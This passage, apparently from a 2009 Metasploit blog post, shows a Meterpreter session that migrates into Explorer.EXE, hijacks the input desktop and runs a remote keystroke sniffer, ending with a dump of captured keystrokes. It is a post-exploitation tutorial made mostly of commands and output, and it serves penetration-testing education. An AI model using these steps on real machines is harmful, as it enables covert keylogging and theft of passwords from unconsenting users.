316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This is a test of the keystroke logger
http://blog.metasploit.com/2009/03/remote-keystroke-sniffing-with.html
Thursday, July 2, 2009
Subscribe to:
Posts (Atom)